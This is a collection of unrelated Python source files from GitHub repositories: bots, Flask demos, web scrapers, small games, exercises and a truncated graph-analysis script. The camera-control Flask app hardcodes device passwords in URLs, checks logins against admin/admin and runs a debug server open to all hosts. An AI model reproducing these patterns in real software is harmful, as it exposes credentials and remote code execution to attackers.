EXP\n@on_natural_language(keywords={'骰子', '色子'}, permission=SUPERUSER | GROUP_MEMBER)\nasync def _(session: NLPSession):\n    times = next(random_ops.nl_proc(session))\n    return IntentCommand(64.0, '扔骰子', current_arg=times or '')\n\n@on_natural_language(keywords={'硬币', '钢镚'}, permission=SUPERUSER | GROUP_MEMBER)\nasync def _(session: NLPSession):\n    times = next(random_ops.nl_proc(session))\n    return IntentCommand(64.0, '扔硬币', current_arg=times or '')\n","repo_name":"cleoold/sendo-erika","sub_path":"plugins/gamble/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"}
{"seq_id":"15345980111","text":"# Import Flask and the other required libraries\nfrom flask import Flask, render_template, request, redirect, url_for, make_response\nimport numpy as np\n\n# Instantiate this application under the name \"app\"\napp = Flask(__name__)\n\n# Function that picks a greeting message at random\ndef picked_up():\n    messages = [\n        \"こんにちは、あなたの名前を入力してください\",\n        \"やあ!お名前は何ですか?\",\n        \"あなたの名前を教えてね\"\n    ]\n    # Pick a random entry from the list with NumPy's random.choice\n    return np.random.choice(messages)\n\n# The routing for the web application starts here\n# Handler for requests to the index page\n@app.route('/')\ndef index():\n    title = \"ようこそ\"\n    message = picked_up()\n    # Render index.html\n    return render_template('index.html',\n                           message=message, title=title)\n\n# Handler for requests to /post\n@app.route('/post', methods=['GET', 'POST'])\ndef post():\n    title = \"こんにちは\"\n    if request.method == 'POST':\n        # Get the \"name\" field from the request form\n        name = request.form['name']\n        # Render index.html\n        return render_template('index.html',\n                               name=name, title=title)\n    else:\n        # Redirect like this on errors and the like\n        return redirect(url_for('index'))\n\n\n@app.route('/graph1')\ndef graph1():\n    import matplotlib.pyplot\n    from matplotlib.backends.backend_agg import FigureCanvasAgg\n    import io\n    import random\n\n    fig, ax = matplotlib.pyplot.subplots()\n    ax.set_title(u'IMINASHI GRAPH')\n    x_ax = range(1, 284)\n    y_ax = [x * random.randint(436, 875) for x in x_ax]\n    ax.plot(x_ax, y_ax)\n\n    canvas = FigureCanvasAgg(fig)\n    buf = io.BytesIO()  # PNG data is binary, so BytesIO is required (StringIO would fail here)\n    canvas.print_png(buf)\n    data = buf.getvalue()\n\n    response = make_response(data)\n    response.headers['Content-Type'] = 'image/png'\n    response.headers['Content-Length'] = len(data)\n    return response\n\n\nif __name__ == '__main__':\n    app.debug = True # enable debug mode\n    app.run(host='0.0.0.0') # reachable from any host\n","repo_name":"yukimori/misc","sub_path":"flask/basic/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"10291548186","text":"# coding=utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport psycopg2\nfrom config import config\nimport re\nfrom orm import Persistent\nfrom hashlib import md5\nimport asyncio\nfrom aiohttp import ClientSession, ClientTimeout, ClientConnectorError\n\ntimeoutSettings = ClientTimeout(total=5)\n\nasync def fetch(*args, **kwargs):\n    sleep_time = 30\n    while True:\n        async with sem:\n            try:\n                print(kwargs[\"url\"][:80])\n\n                if \"data\" in kwargs:\n                    print(str(kwargs[\"data\"])[:80])\n                elif \"params\" in kwargs:\n                    print(str(kwargs[\"params\"])[:80])\n\n                async with ClientSession(timeout=timeoutSettings) as session:\n                    async with session.request(*args, **kwargs) as page:\n                        if page.status == 404:\n                            return None\n                        elif page.status >= 500:\n                            continue\n                        elif page.status != 200:\n                            continue\n                        else:\n                            return await page.text()\n            except 
ClientConnectorError:\n print(\"\\nEXCEPTION\\n\")\n continue\n except asyncio.TimeoutError:\n print(\"TIMEOUT, SLEEPING {}s...\".format(sleep_time))\n await asyncio.sleep(sleep_time)\n sleep_time += 30\n continue\n\n\n\nasync def scrap_plan(conn, degree_code, subject_code=None, year=None):\n pla_docent_url = \"http://www.ub.edu/grad/plae/AccesInformePD\"\n get_params = {\n \"curs\": year,\n \"idioma\": \"CAT\",\n \"codiGiga\": subject_code,\n \"recurs\": \"publicacio\"\n }\n\n try:\n pla_docent_text = await fetch(url=pla_docent_url, method=\"GET\", params=get_params)\n except ClientConnectorError:\n print(\"\\nException @scrap_plan!\")\n print(degree_code)\n print(pla_docent_url)\n print(str(get_params))\n print()\n return\n\n year_alias = str(year) + \"-\" + str(year + 1)\n Persistent(conn, \"subject_year\", pkey=[\"subject_code\", \"year\"],\n subject_code=subject_code,\n year=year,\n year_alias=year_alias,\n pla_docent=pla_docent_text)\n\n if pla_docent_text is None: return\n\n pla_docent_soup = BeautifulSoup(pla_docent_text, \"html.parser\")\n\n competencies = pla_docent_soup.find_all(\"table\", class_=\"taulaCompetencies\")\n\n for table in competencies:\n for tag in table.find_all(\"span\"):\n if tag.string is not None:\n matching = re.match(\"([^.]{1,45})\\s*\\.\\s*(.+)\", tag.string.strip())\n try:\n comp_id, comp_desc = matching.groups()\n except AttributeError:\n comp_desc = tag.string\n comp_id = md5(comp_desc.encode(\"utf-8\")).hexdigest()\n\n Persistent(conn, \"competence\", pkey=[\"id\"], id=comp_id, description=comp_desc)\n Persistent(conn, \"subject_competence\", subject_code=subject_code, competence_id=comp_id)\n\n\n# http://www.ub.edu/grad/plae/AccesInformePD?curs=2018&codiGiga=364292&idioma=CAT&recurs=publicacio\nasync def fetch_professor(conn, degree_code, year, professor_code):\n directori_url = \"http://www.ub.edu/grad/infes/fitxaInfe.jsp\"\n post_params = {\n \"n0\": \"P2L\",\n \"n1\": \"000\",\n \"n2\": 1,\n \"curs\": year,\n \"ens\": degree_code,\n \"prof\": professor_code\n }\n\n try:\n directori_text = await fetch(url=directori_url, method=\"POST\", data=post_params)\n if directori_text is None: return\n except ClientConnectorError:\n print(\"\\nProfessor exception!\\n\")\n return\n\n dsoup = BeautifulSoup(directori_text, \"html.parser\")\n\n name = dsoup.select_one(\"td.titol_paginaPDI\")\n email = dsoup.select_one(\"a[href^=mailto]\")\n department = dsoup.select_one(\"td.titoltext3\")\n\n if name is None:\n return\n else:\n name = name.text.strip()\n name = re.sub(\"(^[.,]|[.,]$)\", \"\", name).strip()\n name = re.sub(\"\\s+\", \" \", name).title()\n\n if email is not None: email = email.text.strip()\n if department is not None: department = department.text.strip()\n\n return Persistent(conn, \"professor\",\n pkey=[\"name\"],\n update=True,\n name=name,\n department=department,\n email=email).result[\"code\"]\n\n\nasync def scrap_schedule(conn, degree_code, subject_code, year, semester):\n semester = str(semester)\n horaris_url = \"http://www.ub.edu/grad/infes/fitxaInfe.jsp\"\n post_params = {\n \"curs\": year,\n \"ens\": degree_code,\n \"assig\": subject_code,\n \"n0\": \"2L\",\n \"n1\": \"00\",\n \"n2\": \"1\",\n \"cicle\": \"g\",\n \"cursImp\": \"null\",\n \"grup\": \"null\",\n \"semImp\": \"null\",\n \"semIni\": semester,\n \"prof\": \"\",\n \"tipus\": \"FB\",\n \"ta\": \"null\",\n \"target\": \"_parent\"\n }\n\n try:\n horaris_text = await fetch(url=horaris_url, method=\"POST\", data=post_params)\n if horaris_text is None: return\n except 
ClientConnectorError:\n print(\"\\nSchedule exception!\\n\")\n return\n\n horaris_soup = BeautifulSoup(horaris_text, \"html.parser\")\n\n for group in horaris_soup.find_all(\"div\", class_=\"faGrup\"):\n group_table = group.find(\"table\", class_=\"faPlanifGrup\")\n if group_table is None: # skip headers & the like\n continue\n\n faDDGrup = group_table.find(\"td\", class_=\"faDDGrup\")\n schedule = group_table.find(\"table\", class_=\"idh\")\n profs = group_table.find(\"td\", class_=\"cPlanif_Prof_M1\")\n room = group_table.find(\"td\", class_=\"cPlanif_Local_M1\")\n language = group_table.find(\"td\", class_=\"faDDIdioma\")\n\n # Clean nullable columns\n if schedule is not None: schedule = str(schedule)\n if room is not None: room = room.text.strip()\n if language is not None: language = language.text.strip()\n\n # Clean variables\n class_group_id = None\n professor_code = None\n\n if faDDGrup is not None:\n class_group_id = Persistent(conn, \"class_group\",\n pkey=[\"subject_code\", \"year\", \"semester\", \"group\"],\n subject_code=subject_code,\n year=year,\n semester=semester,\n group=faDDGrup.text.strip(),\n schedule=schedule,\n room=room,\n language=language).result[\"id\"]\n\n if profs is not None:\n for professor in profs.find_all(\"a\"):\n professor_code = re.search(\"fitxaProf\\('(\\d+)'\\)\", professor[\"href\"])[1]\n professor_code = await fetch_professor(conn,\n degree_code=degree_code,\n year=year,\n professor_code=professor_code)\n\n\n if None not in [class_group_id, professor_code]:\n Persistent(conn, \"class_group_professor\",\n class_group_id=class_group_id,\n professor_code=professor_code)\n\n\nasync def scrap_subject(conn, degree_code=None, subject_code=None, year=None):\n # We need to scrap plans before schedule because of foreign key constraints in the database\n await scrap_plan(conn=conn, degree_code=degree_code, subject_code=subject_code, year=year)\n\n await asyncio.gather(\n asyncio.create_task(\n scrap_schedule(conn, degree_code=degree_code, subject_code=subject_code, year=year, semester=1)),\n asyncio.create_task(\n scrap_schedule(conn, degree_code=degree_code, subject_code=subject_code, year=year, semester=2))\n )\n\n\nasync def scrap_degree_year(conn, code, current_year, type):\n # get subject codes:\n subject_list_url = \"http://www.ub.edu/grad/infes/fitxaInfe.jsp?n0=L&n1=0&n2=1&ens={}&curs={}&tipus={}\" \\\n .format(code, current_year, type)\n\n # http://www.ub.edu/grad/infes/fitxaInfe.jsp?n0=L&n1=0&n2=1&curs=2018&ens=TG1077\n\n try:\n subject_list_text = await fetch(url=subject_list_url, method=\"GET\")\n if subject_list_text is None: return\n except ClientConnectorError as e:\n print(str(e))\n return\n\n subject_list_soup = BeautifulSoup(subject_list_text, \"html.parser\")\n degree_name = subject_list_soup.find(\"td\", class_=\"titol_pagina\").text.strip()\n if degree_name:\n Persistent(conn, \"degree\", pkey=[\"code\"], code=code, name=degree_name)\n\n subject_tasks = []\n\n for tr in subject_list_soup.find_all(\"tr\"):\n ioAssigCodi = tr.find(\"td\", class_=\"ioAssigCodi\")\n ioAssigDesc = tr.find(\"td\", class_=\"ioAssigDesc\")\n ioAssigCredits = tr.find(\"td\", class_=\"ioAssigCredits\")\n if None in [ioAssigCodi, ioAssigDesc, ioAssigCredits]:\n continue\n\n subject_code = ioAssigCodi.text.strip()\n\n Persistent(conn, \"subject\",\n pkey=[\"code\"],\n code=subject_code,\n name=ioAssigDesc.text.strip(),\n credits=ioAssigCredits.text.strip())\n\n Persistent(conn, \"degree_subject\", pkey=[\"degree_code\", \"subject_code\"],\n degree_code=code,\n 
subject_code=subject_code,\n type=type)\n\n subject_tasks.append(\n asyncio.create_task(\n scrap_subject(conn=conn, degree_code=code, subject_code=subject_code, year=current_year)\n )\n )\n\n await asyncio.gather(*subject_tasks)\n\n\nasync def main():\n year_range = [2019, 2018, 2017]\n\n tasks = []\n for i in [1042, 1077]: # range(1000, 1110): # range(1077, 1078):\n for year in year_range:\n for type in [\"FB\", \"OB\", \"OT\", \"TR\", \"PR\"]:\n tasks.append(\n asyncio.create_task(\n scrap_degree_year(conn=conn, code=\"TG{}\".format(i), current_year=year, type=type)\n )\n )\n await asyncio.gather(*tasks)\n\n\nif __name__ == \"__main__\":\n params = config()\n conn = psycopg2.connect(**params)\n\n sem_tokens = input(\"Semaphore limit? (15) \")\n if sem_tokens == \"\":\n sem_tokens = 15\n sem = asyncio.Semaphore(int(sem_tokens))\n\n loop = asyncio.get_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(main())\n\n conn.close()\n","repo_name":"3nr1c/grad-db","sub_path":"scrapper/app/grad.py","file_name":"grad.py","file_ext":"py","file_size_in_byte":10672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"429628890","text":"\nfrom game.game_state import GameState\n\nimport pygame\nfrom game.constants import *\nfrom game.game_state import *\nfrom game.gui.button import Button\n\nclass ScoreboardMenu(GameState):\n def __init__(self, type, game, paused = False):\n super().__init__(type, game, paused)\n\n self.font_14 = self.game.assets_manager.get_asset(\"PixelFont14\").asset_load\n\n self.back_button = Button(\n game,\n \"Voltar\",\n self.font_14, \n 640-60, 600, \n 120, 40, \n (200, 100, 30),\n (190, 90, 20), \n (170, 80, 20))\n\n def update(self):\n \n # Set background\n self.game.render.fill_screen(COLOR_BACKGROUND)\n\n font18 = self.game.assets_manager.get_asset(\"PixelFont18\").asset_load\n font14 = self.game.assets_manager.get_asset(\"PixelFont14\").asset_load\n self.game.render.render_text_centered(\"Top 10 jogadores\", 640, 80, (245, 245, 245), font18)\n\n # Rendering the scores tables\n score_text_width = 305\n score_text_pos_x = 50\n\n for i in range(0, 4):\n \n num_of_rings = i+3\n\n # Top title, num of rings\n self.game.render.render_text(f\"{num_of_rings} anéis\", score_text_pos_x, 160, COLOR_YELLOW, font18)\n\n # Getting data\n scores = self.game.config_manager.get_score_by_rings_amount(num_of_rings)\n\n score_text_pos_y = 200\n\n if(len(scores) == 0):\n self.game.render.render_text(\"Ninguém jogou.\", score_text_pos_x, score_text_pos_y, (100, 100, 100), font14)\n score_text_pos_x += score_text_width\n continue\n\n for score in scores:\n score_name = score[0]\n score_number = score[1]\n\n self.game.render.render_text(score_name, score_text_pos_x, score_text_pos_y, (245, 245, 245), font14)\n self.game.render.render_text_right(str(score_number), score_text_pos_x+score_text_width-40, score_text_pos_y, (245, 245, 245), font14)\n\n score_text_pos_y += 25\n \n score_text_pos_x += score_text_width\n\n if(self.back_button.draw()):\n self.game.state_manager.pause_state(\"ScoreboardMenu\")\n self.game.state_manager.unpause_state(\"MainMenu\")\n","repo_name":"dansch0/tower-of-hanoi","sub_path":"game/states/scoreboard_menu.py","file_name":"scoreboard_menu.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7530198618","text":"\"\"\"\r\nFile: bouncing_ball\r\nName:Mona Lai\r\n-------------------------\r\nThis 
program is an animation that shows the process of throwing a ball.\r\nEach player can throw the ball only three times.\r\n\"\"\"\r\n\r\nfrom campy.graphics.gobjects import GOval\r\nfrom campy.graphics.gwindow import GWindow\r\nfrom campy.gui.events.timer import pause\r\nfrom campy.gui.events.mouse import onmouseclicked\r\n\r\nVX = 3\r\nDELAY = 10\r\nGRAVITY = 1\r\nSIZE = 20\r\nREDUCE = 0.9\r\nSTART_X = 30\r\nSTART_Y = 40\r\n\r\nwindow = GWindow(800, 500, title='bouncing_ball.py')\r\nball = GOval(SIZE, SIZE, x=START_X, y=START_Y)\r\nball.filled = True\r\nis_ball_moving = False\r\n\r\n\r\n\r\ndef main():\r\n    \"\"\"\r\n    This program simulates a bouncing ball at (START_X, START_Y)\r\n    that has VX as x velocity and 0 as y velocity. Each bounce reduces\r\n    y velocity to REDUCE of itself.\r\n    \"\"\"\r\n    global is_ball_moving\r\n    ball.filled = True\r\n    window.add(ball)\r\n    vy = 0\r\n    count = 0\r\n    onmouseclicked(start)\r\n\r\n    while True:\r\n        if is_ball_moving and count < 3:\r\n            ball.move(VX, vy)\r\n            vy += GRAVITY\r\n            if ball.y + ball.height > window.height:\r\n                if vy > 0:\r\n                    vy *= -REDUCE\r\n            if ball.x > window.width:\r\n                vy = 0\r\n                ball.x = START_X\r\n                ball.y = START_Y\r\n                is_ball_moving = False\r\n                count += 1\r\n        pause(DELAY)\r\n\r\n\r\ndef start(event):\r\n    global is_ball_moving\r\n    is_ball_moving = True\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"Mona0104/MyStanCodeProjects","sub_path":"MystanCode_Project/Drawing/bouncing_ball.py","file_name":"bouncing_ball.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"7001029895","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n'''\r\n@File    :   test.py\r\n@Time    :   2020/07/01 12:57:18\r\n@Author  :   艾强云\r\n@Contact :   aqy0716@163.com\r\n@Department   :  SCAU \r\n@Desc    :   None\r\n'''\r\n\r\n# here put the import lib\r\na=[1,2,3,4,5]\r\nc=a[4:5]\r\n\r\nprint(c)","repo_name":"huoweikong/vscode-python-kiton","sub_path":"实验室数据分析/序列分析/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"10036108470","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n    long_description = fh.read()\n\nwith open(\"requirements.txt\", \"r\") as f:\n    requirements = f.readlines()\n\nsetup(\n    name='reactive-uart2ip',\n    version='0.2.1',\n    author=\"Gianluca Scopelliti\",\n    author_email=\"gianlu.1033@gmail.com\",\n    description=\"TCP server that mediates UART serial communication\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/AuthenticExecution/reactive-uart2ip\",\n    packages=find_packages(),\n    install_requires=requirements,\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: POSIX :: Linux\",\n    ],\n    python_requires='>=3.6',\n    entry_points={\n        'console_scripts': ['reactive-uart2ip = uart2ip.main:main']\n    },\n)\n","repo_name":"AuthenticExecution/reactive-uart2ip","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"32232409530","text":"from flask import Flask, render_template, Response, request, redirect, url_for, send_file\nimport cv2\nfrom AttedanceProject import VideoCamera\nimport requests\napp = 
Flask(__name__)\n\n#camera = cv2.VideoCapture('http://192.168.2.10:21866/videostream.cgi?user=admin&pwd=gigirivas',cv2.CAP_FFMPEG)\n \n#camera = cv2.VideoCapture(0) # use 0 for web camera\n#for cctv camera use rtsp://username:password@ip_address:554/user=username_password='password'_channel=channel_number_stream=0.sdp' instead of camera\n# for local webcam use cv2.VideoCapture(0)\n\n@app.route('/Download') # the decorator's @ was missing, so this route was never registered\ndef download_file():\n    #For windows you need to use drive name [ex: F:/Example.pdf]\n    path = \"/home/pi/Desktop/FaceRecognitionProject/Attendance.csv\"\n    return send_file(path, as_attachment=True)\n\ndef gen_frames(): # generate frame by frame from camera\n    CameraObj = VideoCamera()\n    while True:\n        frame = CameraObj.FaceRecognition()\n        yield (b'--frame\\r\\n'\n               b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n') # concat frame one by one and show result\n\n\n@app.route('/video_feed')\ndef video_feed():\n    #Video streaming route. Put this in the src attribute of an img tag\n    return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')\n\n@app.route('/buttonUP')\ndef up():\n    Up=requests.get('http://192.168.2.2:29626/decoder_control.cgi?loginuse=admin&loginpas=gigirivas&onestep=1&command=0') \n    print(\"UP PRESSED\")\n    print(Up.status_code, Up.reason)\n    return (''),204\n@app.route('/buttonDOWN')\ndef down():\n    Down=requests.get('http://192.168.2.2:29626/decoder_control.cgi?loginuse=admin&loginpas=gigirivas&onestep=1&command=2')\n    print(\"DOWN PRESSED\")\n    print(Down.status_code, Down.reason)\n    return (''),204\n@app.route('/buttonLEFT')\ndef left():\n    Left=requests.get('http://192.168.2.2:29626/decoder_control.cgi?loginuse=admin&loginpas=gigirivas&onestep=1&command=4')\n    print(\"LEFT PRESSED\")\n    \n    return (''),204\n@app.route('/buttonRIGHT')\ndef right():\n    Right=requests.get('http://192.168.2.2:29626/decoder_control.cgi?loginuse=admin&loginpas=gigirivas&onestep=1&command=6') \n    print(\"RIGHT PRESSED\")\n    \n    return (''),204\n# @app.route('/index',methods=['GET', 'POST'])\n# def index():\n#     if request.method == 'POST':\n#         if request.form['up'] == 'Do Something':\n#             print(\"CAMERA LOOK UP ONE STEP\")\n#         elif request.form['down'] == 'Do Something Else':\n#             print(\"CAMERA LOOK DOWN ONE STEP\")\n#         else:\n#             pass # unknown\n#     elif request.method == 'GET':\n#         print('get')\n#     \"\"\"Video streaming home page.\"\"\"\n    #return render_template('index.html')\n\n\n# Route for handling the login page logic\n@app.route('/', methods=['GET', 'POST'])\ndef login():\n    error = None\n    if request.method == 'POST':\n        if request.form['username'] != 'admin' or request.form['password'] != 'admin':\n            error = 'Invalid Credentials. 
Please try again.'\n        else:\n            return render_template('index.html')\n            #return redirect(url_for('index'))\n    return render_template('login.html', error=error)\n\nif __name__ == '__main__':\n\n    app.run(host='0.0.0.0',port=5000,debug=True,threaded=True)","repo_name":"Ddimitrako/Face-Recognition-Attendance-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"10060315718","text":"from prefect.deployments import Deployment\nfrom prefect.infrastructure.docker import DockerContainer\nfrom gcs_to_bq import etl_gcs_to_bq\n\ndocker_block = DockerContainer.load(\"steam-docker\")\n\ndocker_dep = Deployment.build_from_flow(\n    flow=etl_gcs_to_bq,\n    name=\"docker-bq-flow\",\n    infrastructure=docker_block,\n)\n\nif __name__ == \"__main__\":\n    docker_dep.apply()","repo_name":"aliescont/dezoomcamp-project","sub_path":"prefect/flows/docker-bq-deploy.py","file_name":"docker-bq-deploy.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"36504191400","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nfrom bs4 import BeautifulSoup\nfrom magistral.items import Product\nfrom scrapy.loader import ItemLoader\n\nproduct_item = Product()\n\n\nclass MagistralSpider(scrapy.Spider):\n    name = 'mst'\n    allowed_domains = ['magistral-nn.ru']\n\n    def start_requests(self):\n        SECTION_ID = ['23483', '23484', '23485', '23486', '23487', '23488', '23489', '23490', '23491', '23492',\n                      '23496', '23497', '23498', '23512', '23513', '23522', '23523', '23524', '23525', '23526', '23527', '23528', '23529']\n        for param in SECTION_ID:\n            yield scrapy.FormRequest(f'https://www.magistral-nn.ru/automag/?SECTION_ID={param}&getdata=true&nd=1616783290021&_search=true&nd=1616786082075&rows=50&page=1&sidx=id&sord=asc&name=%D0%92%D0%90%D0%97',\n                                     callback=self.parse, method='GET')\n\n    def build_images_url(self, text):\n        full_url = 'https://www.magistral-nn.ru' + text\n        return full_url\n\n    def parse(self, response):\n        page = json.loads(response.text)['page']\n        total = json.loads(response.text)['total']\n        navigation_categories = json.loads(response.text)['cat']\n        for row in json.loads(response.text)['rows']:\n            loader = ItemLoader(item=Product(), selector=row)\n            cols = row['cell'][6]\n            soupe = BeautifulSoup(cols, 'lxml')\n            if row['cell'][0]:\n                part_url_big_img = BeautifulSoup(row['cell'][0], 'lxml').select('span')[0]['data-dp']\n                full_url_big_img = self.build_images_url(part_url_big_img)\n                # str.strip() removes a *set* of characters, not a prefix; slice the directory prefix off instead\n                name_image = part_url_big_img[len('/upload/prod_images/catalog/'):][:-2]\n            else:\n                full_url_big_img = 'NONE'\n                name_image = 'NONE'\n            reformat_description = soupe.get_text()\n            categories = str(navigation_categories) + str(reformat_description)\n            print('input ITEM')\n            print(categories)\n            loader.add_value('title', reformat_description[-4:])\n            loader.add_value('price', row['cell'][9])\n            loader.add_value('balance', row['cell'][8])\n            loader.add_value('description', reformat_description)\n            loader.add_value('producer', row['cell'][13])\n            loader.add_value('model_auto', reformat_description[-7:-3])\n            loader.add_value('navigation_categories', categories)\n            #loader.add_value('images', row['cell'][0])\n            loader.add_value('image_alt', 'img_hex')\n            loader.add_value('image_urls', full_url_big_img)\n            loader.add_value('product_url', name_image)\n            yield loader.load_item()\n        page += 1\n        if int(page) < 2:\n            yield scrapy.FormRequest(\n                
f'https://www.magistral-nn.ru/automag/?SECTION_ID=23483&getdata=true&nd=1616783290021&_search=true&nd=1616786082075&rows=50&page={page}&sidx=id&sord=asc&name=%D0%92%D0%90%D0%97',\n                callback=self.parse, method='GET')\n        print('========= KONEC ================')","repo_name":"maxs2x/crawl_for_shop","sub_path":"magistral/spiders/magistral.py","file_name":"magistral.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"9979023985","text":"#title#\r\n# Maximum interval sum\r\n#subtitle#\r\n# Find the maximum interval sum as a difference of prefix sums (ar - al)\r\n\r\n#name#\r\n# Maximum interval sum\r\n#description#\r\n# Find the maximum interval sum as a difference of prefix sums (ar - al)\r\n#body#\r\n\r\nclass Imos:\r\n    def __init__(self, a:list):\r\n        self.origin = a\r\n        self.accum = [0]\r\n        for ai in a:\r\n            self.accum.append(self.accum[-1] + ai)\r\n        self.n = self.accum\r\n        self.INF = float('inf')\r\n\r\n    def _get_max(self, accum:list):\r\n        \"\"\"\r\n        Maximum of the interval sum (ar - al):\r\n        max(ar - min(al))\r\n        \"\"\"\r\n        ret_min = - self.INF\r\n        min_al = self.INF\r\n        for ar in accum:\r\n            ret_min = max(ar - min_al, ret_min)\r\n            min_al = min(ar, min_al)\r\n        return ret_min\r\n\r\n    @property\r\n    def get_max(self):\r\n        return self._get_max(self.accum)\r\n\r\n    @property\r\n    def get_min(self):\r\n        return - self._get_max([-ai for ai in self.accum])\r\n\r\n\r\nn = int(input())\r\na = list(map(int, input().split()))\r\nfor i, ai in enumerate(a):\r\n    if ai==0:\r\n        a[i] = -1\r\n\r\nim = Imos(a)\r\nprint(im.get_max - im.get_min + 1)\r\n\r\n\r\n#prefix#\r\n# Lib_A_区間和の最大値\r\n#end#\r\n","repo_name":"ibtosmlin/atcoder","sub_path":"lib/lib/Lib_A_区間和の最大値.py","file_name":"Lib_A_区間和の最大値.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"71411164599","text":"from stacks_and_queues.stack import Stack\nimport copy\n\n\n# Time/Space O(n)\ndef find_min_max(stack, pos):\n    aux = copy.copy(stack)  # copy over here\n    i, min, max = 0, None, None\n    size = aux.size\n    while i < size - pos:\n        value = aux.pop()\n        if i >= pos:\n            if max is None or value > max:\n                max = value\n            if min is None or value < min:\n                min = value\n        i += 1\n    return min, max\n\n\ndef sort_stack(stack):\n    i, j = 0, int(stack.size/2)\n    size = stack.size\n    while i < j:\n        min, max = find_min_max(stack, i)\n        k = 0\n        aux = Stack()\n        while k <= size:\n            if k == size - i:\n                aux.push(max)\n            else:\n                value = stack.pop()\n                if value != max:\n                    aux.push(value)\n            k += 1\n        k = 0\n        stack = Stack()\n        while k <= size:\n            if k == size - i:\n                stack.push(min)\n            else:\n                value = aux.pop()\n                if value != min:\n                    stack.push(value)\n            k += 1\n        i += 1\n    return stack\n\n\n# Space O(n). 
Time O(n^2)\ndef sort_stack2(stack):\n changes = 0\n is_max = True\n while changes < stack.size - 1 or not is_max:\n aux = Stack()\n changes = 0\n max_min = stack.pop()\n while not stack.is_empty():\n v = stack.pop()\n if (is_max and v > max_min) or (not is_max and v < max_min):\n max_min, v = v, max_min\n changes += 1\n aux.push(v)\n aux.push(max_min)\n stack = aux\n is_max = not is_max\n return stack\n\n\n# Tests:\n# stack = Stack()\n# stack.push(3)\n# stack.push(2)\n# stack.push(4)\n# stack.push(1)\n# stack.push(6)\n# stack.push(5)\n# print(stack)\n# print(sort_stack2(stack))\n","repo_name":"brunoliberal/exercises","sub_path":"stacks_and_queues/sort_stack.py","file_name":"sort_stack.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38181061993","text":"from graph_tool.all import *\nfrom time import gmtime, strftime\nfrom enum import Enum\nfrom utils.unconnected_graphs import UnconnectedGraphs\n\nimport argparse\nimport sys\nimport math\nimport os\nimport itertools\n\nDEFAULT_OUTPUT_DIR = \"../out/\"\nHELP_INFO_MSG = \"Try 'graph_analyzer -h' for more information.\"\n\n\ndef print_graph_vertex(graph: Graph, vertex: int):\n \"\"\"\n Prints some information about the given node (a.k.a. vertex).\n 'in-degree': The number of edges to parent nodes.\n 'out-degree': The number of edges to child nodes.\n 'value': The name of the node.\n\n :param graph: the graph to print\n :param vertex: optional list of vertices to print out\n \"\"\"\n print(\"vtx[%s]\" % vertex,\n \"in:\", graph.vertex(vertex).in_degree(),\n \"out:\", graph.vertex(vertex).out_degree(),\n \"val:\", graph.vp.vertex_name[vertex])\n\n\ndef print_vertex_children(graph: Graph, vertex: int, degree=1):\n \"\"\"\n Prints the given vertex and all its (sub-)children in a tree-like structure.\n\n :param graph: the graph which contains the given vertex\n :param vertex: the vertex index of the parent node to print\n :param degree: the degree of sub-children to print\n \"\"\"\n BRANCH_FORK = \"├─ \"\n BRANCH_END = \"└─ \"\n BRANCH_SELF = \"● \"\n TREE_TRUNK = \"│ \"\n TREE_EPMTY = \" \"\n\n def print_recursive(vtx: int, deg=1, indent=\"\", branch=\"\"):\n out_degree = graph.vertex(vtx).out_degree()\n print(\"%s%svtx[%s]\" % (indent, branch, vtx),\n \"in:\", graph.vertex(vtx).in_degree(),\n \"out:\", out_degree,\n \"val:\", graph.vp.vertex_name[vtx])\n\n if branch == BRANCH_FORK:\n indent += TREE_TRUNK\n elif branch == BRANCH_END:\n indent += TREE_EPMTY\n\n if out_degree and deg:\n for child in graph.get_out_neighbours(vtx)[:-1]:\n if child == vtx:\n if not branch:\n branch += BRANCH_FORK\n print(\"%s%svtx[%s]\" % (indent, branch[:-2] + BRANCH_SELF, child),\n \"in:\", graph.vertex(child).in_degree(),\n \"out:\", out_degree,\n \"val:\", graph.vp.vertex_name[child])\n else:\n print_recursive(child, deg - 1, indent, BRANCH_FORK)\n\n child = 